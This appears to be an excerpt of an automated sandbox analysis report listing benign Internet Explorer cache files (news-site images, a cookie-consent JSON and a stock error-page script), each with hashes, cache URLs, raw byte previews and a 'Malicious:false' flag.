                                                                                                                                                                                                  SHA1:3D4DDD2046FC28AA98498C2613B14B5394620F76
                                                                                                                                                                                                  SHA-256:A191A7356C640B3CA46659487480C491B619B4CEA0C71E02E001A1613E064A8C
                                                                                                                                                                                                  SHA-512:D4EA2A8431190F7B9FCDCA9C056C00F97461730AD28859A34384A6197E02C15E8DE5F6A54A7125C655E5DA1AB463ED1EC3A549F9A49E4FCFC291A0EEDC3B5472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cYUGz.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                  Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....W....n.......[D%..'.T..T....2.~\Q.:..P.}..(.<.R..jn;......*{4r.:..U..ec.WE0 x0..=.O.Z).gDc.{..?....C.....'.5..2. ..u...lI....0......Hv>..I..{......o.M.(..Xg......i]$X.....*..<7(..@z.U.4&))M%!.E...n1E/j(...Z\R....(..Q.j)...B3YF.4..!).O.[Q..3..HE0.......3/.....Fv.G.?...?..O...n........k..........)S.4..k". g........@.~)......9..o.y....n.O..\1..>..9.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1cYXM1[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):9302
                                                                                                                                                                                                  Entropy (8bit):7.740117066295701
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BYz5lTCV2tSKKnJtEF0NDuo3KfTP29HOKIViTsb4jYwL:ezqpKK7c0hu/fT+Hqiob4H
                                                                                                                                                                                                  MD5:E8891F7768542DA8233A5960D9C558AE
                                                                                                                                                                                                  SHA1:A24CA8AAA931F1668AF96E53796F44704B7FAC2D
                                                                                                                                                                                                  SHA-256:979EA6AFC6B23D581FB97C9CE6D05D15AFBB5E364CE7C37A8827365F2AC1CA8F
                                                                                                                                                                                                  SHA-512:4C6821E386CB1AC2F4CC749CD711B9BEA3CB60D96F52BB540FEBA2CEB7211E25F3C4663CA469630F42A9CF3EB2FA5543F00304AFB9004866F0CFE80C68197092
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cYXM1.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                  Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..1K.P)q@.K.)q@.(..(..&(.;.b...1K.\P!....Q..n(.;.b...1N.&(.....Rb...LS.IL..K.LP.b..u%..IO..@....b..E-...QE..QE..QE..QE..QE.Y..)qKRP.........)qK..n(.;.b...b....&(..(..&)1N.......Rb...LS.F)..R.O.7...RS.F(....?....Jv)1@..S.I@.....JJZ(.(.....Z(.(.....R.LE.R......\R.(.1KK.1@..\R.P.b.R...J1KF(.........Q.v(..3......f)......Rb.E&(..R.N.&(..SH..I..f)1O.&(....;.....v)1L........
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1cZ69Y[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):7284
                                                                                                                                                                                                  Entropy (8bit):7.853431320862787
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:BGs6Ez6yx5pN22u20BWSxuvoclGFC0dTaFDKgyCATfoKuSGFL9cHYzBGDF8Uk/:BYyvNZdRlGs8KDjytTLW2YzBKF8d
                                                                                                                                                                                                  MD5:423ACB7276B26FE2BD368FB36DAC33D6
                                                                                                                                                                                                  SHA1:3156E6805D57E65FA3AF14BD28E82ED499FF788A
                                                                                                                                                                                                  SHA-256:7F6F55247F850DD93EAAD0AF9E0DE65B4AA4420E2E722165EE431BE5CC3F1B74
                                                                                                                                                                                                  SHA-512:A5BA414D625B8609508215F092FBC5CCFAFF0ED11A86C2ECD390B35AA569C006600D39F18A2ABBCD8DD3FE27553CC75577D296963F5703B6D002A10957D49A36
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cZ69Y.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=456&y=196
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....p....AD&3F..n.@E...R..DLP.U*U\R.Jx..".)iE .....)..(".A.....7.....v)v..1K.P)E.7..S.. .H.;..@...p.4...u..S.."4...4.@...i..".&*CI..h.R.y.i......Q0..QJ(...S....@.).-;4.0)E.)@...-%(.....m....@.IN..........LRb.ME<..FG........C2.=X...A..5$.F..6..Kp.#Q..#.k'.....@.tM.+%ll....I.....<$..sR...A.....Jb..Y.V....U<...y.K......m;Z..a.He.....:.R...`....>...H..0.jZB(..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1cZagv[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):25178
                                                                                                                                                                                                  Entropy (8bit):7.9603073003594425
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:7bLo6U+VY6BBXLTh/NfXwD+CrZvWysSs2SsOc4RpS:7Px1PBBX/FiSiV1l0sOc4RpS
                                                                                                                                                                                                  MD5:BF8B92C3E93FDCD97B06585F96EB5EC4
                                                                                                                                                                                                  SHA1:EA34B2A06EB14595432FC6CC04951E6935DFEB51
                                                                                                                                                                                                  SHA-256:4B511A82EC87CD99B459EDC2720E4C49D69211E70D51FA89D0A623F0EB522044
                                                                                                                                                                                                  SHA-512:803E8D80C7F270A2655C044EA1F84381098C14469449C8FD4A3960BFDE401296308FE5475E5EEBA9871919479B1667D9A4371D9AF6E7EB17D047F6D6B004D3F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cZagv.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=223&y=135
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......<}.7.j.t.....'.......V;.....,"...:..........y.....;A.Z..GI..lzA..\..k.^p*..kR..?cA.M..j.H0#U...jE..:..2...r.^5f$../..g.})2..H|Ik..q..K...%....q...=.Dcw..!......$u_.BFDq.R...r..1.7..n.NA..a.%1.&u.k..EP..dG+.+....U.......t.vP...0XQ<.8.Z..+.\.s..q..V...;.........m$.....V..}j..0.?...b.i.....2$.....u.~.}+.i.v.O.8....[.r..c...q.[1.s[.7c=...6.2$..........^.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1cZc7u[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):20543
                                                                                                                                                                                                  Entropy (8bit):7.9390927992044995
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7s4/1TQElhMfFGVKXj6vVQk6hdo4EzS4jqDJ7VK4EIq6uh4R7B3PKmSt+:7s4S++j69SbZEObDlwiuh4dBfKE
                                                                                                                                                                                                  MD5:CFB0674E2C978E5AD32835D54C101014
                                                                                                                                                                                                  SHA1:58E7472AB1D8FFAFD744FA868871EDB43EC1A9B9
                                                                                                                                                                                                  SHA-256:42E332AF6CFFE18B7BEF8AB9001E4C39171683F810A0D956326A2F21954B65BD
                                                                                                                                                                                                  SHA-512:BD7621B89E675C711647BB87862C667AB07DF4B878D0E76104CEECB9FEDABE408242D6BF50517C55240700A2F766950CF60FA4B560478CB936A3F5C27F85FD21
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cZc7u.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=364&y=280
                                                                                                                                                                                                  Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(4QLD3...9...K.Ms.....h.'.......V......(.k...o.z...s.....P.55(..<R..O..O...KH)h...P......-(........ZZJZ.Z(...-.P...R...S..Fz..(....Sii.p.^*$.R...QIKL...........QIJ(..)..(..)..Zb.(.)@...J:.).JZB.JZJ.J(...(....R..@..........`..LwD..._Z...H....H..ry..;.....9....P4....%...Y...(....C/....l08...e..........g..&0.....J...}..f...a..H.....S.....R...<{.SbqC. ....BO.TM.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB6Ma4a[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):396
                                                                                                                                                                                                  Entropy (8bit):6.789155851158018
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPkR/CnFPFaUSs1venewS8cJY1pXVhk5Ywr+hrYYg5Y2dFSkjhT5uMEjrTp:6v/78/kFPFnXleeH8YY9yEMpyk3Tc
                                                                                                                                                                                                  MD5:6D4A6F49A9B752ED252A81E201B7DB38
                                                                                                                                                                                                  SHA1:765E36638581717C254DB61456060B5A3103863A
                                                                                                                                                                                                  SHA-256:500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
                                                                                                                                                                                                  SHA-512:34E44D7ECB99193427AA5F93EFC27ABC1D552CA58A391506ACA0B166D3831908675F764F25A698A064A8DA01E1F7F58FE7A6A40C924B99706EC9135540968F1A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....!IDAT8Oc|. ..?...|.UA....GP.*`|. ......E...b.....&.>..*x.h....c.....g.N...?5.1.8p.....>1..p...0.EA.A...0...cC/...0Ai8...._....p.....)....2...AE....Y?.......8p..d......$1l.%.8.<.6..Lf..a.........%.....-.q...8...4...."...`5..G!.|..L....p8 ...p.......P....,..l.(..C]@L.#....P...)......8......[.7MZ.....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BBO5Geh[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):463
                                                                                                                                                                                                  Entropy (8bit):7.261982315142806
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/W/6T+syMxsngO/gISwEIxclfcwbKMG4Ssc:U/6engigHDm7kNGhsc
                                                                                                                                                                                                  MD5:527B3C815E8761F51A39A3EA44063E12
                                                                                                                                                                                                  SHA1:531701A0181E9687103C6290FBE9CCE4AA4388E3
                                                                                                                                                                                                  SHA-256:B2596783193588A39F9C74A23EE6CA2A1B81F54B735354483216B2EDF1E72584
                                                                                                                                                                                                  SHA-512:0A3E25D472A00FF882F780E7DF1083E4348BCE4B6058DA1B72A0B2903DBC2C53CED08D8247CDA53CE508807FD034ABD8BC5BBF2331D7CE899D4F0F11FD199E0E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs................dIDAT8O.J.A.......,.....v"".....;X.6..J.A,D.h:El...F,lT..DSe.#..$i..3..o.6..3gf..+..\....7..X..1...=.....3.......Y.k-n....<..8...}...8.Rt...D..C).)..$...P....j.^.Qy...FL3...@...yAD...C.\;o6.?.D|..n.~..h....G2i....J.Zd.c.SA....*...l.^P.{....$\..BO.b.km.A.... ...]|.o_x^. .b.Ci.I.e2.....[*..]7.%P61.Q.d...p...@.00..|`...,..v..=.O.0.u.....@.F.......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BBnYSFZ[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):560
                                                                                                                                                                                                  Entropy (8bit):7.425950711006173
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/+m8H/Ji+Vncvt7xBkVqZ5F8FFl4hzuegQZ+26gkalFUx:6H/xVA7BkQZL8OhzueD+ikalY
                                                                                                                                                                                                  MD5:CA188779452FF7790C6D312829EEE284
                                                                                                                                                                                                  SHA1:076DF7DE6D49A434BBCB5D88B88468255A739F53
                                                                                                                                                                                                  SHA-256:D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
                                                                                                                                                                                                  SHA-512:2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....*u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..|>..n4...2.57.*.......f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\cfdbd9[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):740
                                                                                                                                                                                                  Entropy (8bit):7.552939906140702
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                                  MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                                  SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                                  SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                                  SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
                                                                                                                                                                                                  Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\de-ch[1].json
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):78451
                                                                                                                                                                                                  Entropy (8bit):5.363992239728574
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:hlAyi1IXQu+IE6VyKzxLx1wSICUSk4B1C04JLtJQLNEWE9+CPm7DIUYU5Jfoc:hlLQMFxaACNWit9+Ym7Mkz
                                                                                                                                                                                                  MD5:88AB3FC46E18B4306809589399DA1B04
                                                                                                                                                                                                  SHA1:009F623B8879A08A0BDD08A0266E138C500D52DB
                                                                                                                                                                                                  SHA-256:4D4DF96DDF04BBC6255DFF587A1543B26FC23E0B825DEC33576E61B041C3973A
                                                                                                                                                                                                  SHA-512:B01BB16FA1C04B2734B0B6AEE6B1FAFE914F95B21122D2480E09284B038BD966F831C4AA42C031FE5FC51718E1997F779FC6EBCD428DB943E050F362C10F4B29
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
                                                                                                                                                                                                  Preview: {"DomainData":{"cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAllText":"Einstellungen speichern","CookiesUsedText":"Verwendete Cookies","AboutLink":"https://go.microsoft.com/fwlink/?LinkId=5
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\httpErrorPagesScripts[1]
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):12105
                                                                                                                                                                                                  Entropy (8bit):5.451485481468043
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                                                  MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                                                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                                                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                                                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                                                                                  Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\http___cdn.taboola.com_libtrc_static_thumbnails_1e82b6ce08a43a6c5447835aefdf3367[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):15934
                                                                                                                                                                                                  Entropy (8bit):7.967019299674033
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:eRGL5bQp1dkTt0BxH10OB5xiEkZEvSA38I0/LS8ceLuAE8gR:eRGLBu1a2lDiqSPz9EHR
                                                                                                                                                                                                  MD5:54C7D0EDB3D1B4F1928F5942AD7934AA
                                                                                                                                                                                                  SHA1:13ED93CE9F7ADCCFECFECE9F02E2FF8DB756F049
                                                                                                                                                                                                  SHA-256:32579899024DF835AC6A44862107B3380C9C0B7AB36FA011C29D7396401436D7
                                                                                                                                                                                                  SHA-512:716178F6E23685ABAB9998219C7373CE1257B12C7C80D9CF4E62AEC6CF895CCEC4F3E63143A713917322A9D65CA093BED3F1478C12526BDD77C97DFAE813FD46
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F1e82b6ce08a43a6c5447835aefdf3367.jpeg
                                                                                                                                                                                                  Preview: ......JFIF.............C....................................!*$..( ..%2%(,-/0/.#484.7*./....C.......'..'S7/7SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS......7.........................................................................................\.<.ZCl.x.d."..\.EI.:.+E.J.j....V?;..%..nA.m.T....^.2 S....*...JA..@..~.y.u.d.$3,.[..X.\!..K..yRh.&mC........B..=@.T...l..xyL.Ff.]*..1..$...(.I.Q5A.@6.s..-.....s.m...s9zT./;.l...}.....O...z..K......\.Y.9%'.d?YS$%%...wu|..E.D....g.6).1.Q.O..(rS0.?=..bGd.R;e.......>..<.b.F..m]Y.U.hp.2...a..y.<...*Ip@%.d..iTO...}.%.&.+4.A.E.eJ....KS*J\Wed...K.^L....gkc6OJ.z.0..6+U.'-M.T.Rz..=aN.4.....Y..T.F....u...q47'7b..v.i..sG.K.......V....rJ.e..-.3Y...[~]{..o......>.....r.!b...4.=*.^....c.R!.C.o-;.AX..,..-.^..\..E...|.;V?...3..r..,,h(.k6%v.ri5J..nn........"..e'|D8..W...".'....a.X.%..M...EjHh..=`.;=Em....Y....R9.[y..1.+.=..U....{.]f\.p..D.~..h.C...>..p.TG..QD.....aD..S.]qy..V.r{ ....MHL.'k..S|(.s.t.2...9......f.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\http___cdn.taboola.com_libtrc_static_thumbnails_634028cc45358ad57db10dfb727c0507[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):16062
                                                                                                                                                                                                  Entropy (8bit):7.967250939029658
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:eRk7H2qoWunNKHIvSWYlr5MqUAPxwfrHYREO3SKnC1+b9ZstGCHigR2:eWCqmNPYZ5bPxwfrHY2ESKnC8uoCA
                                                                                                                                                                                                  MD5:6A976545B30EB06ACAA3A7A48FDDB11C
                                                                                                                                                                                                  SHA1:F8E35CE6CDB1517402D6BC91A21DFBE3DE8283FF
                                                                                                                                                                                                  SHA-256:49546F36A94A671019B59F3A177F7EF744DB74A3385674E08D70EEC2CC0CD6E6
                                                                                                                                                                                                  SHA-512:93E758449B5A958B040E4CB8465FD12955CA22AF198D1E5CE4981C5FF0DD19AEBAFF91B942A10BA75CDF320DD09A2725FF00419D470B873DEAC74A114D8E2D2F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F634028cc45358ad57db10dfb727c0507.jpg
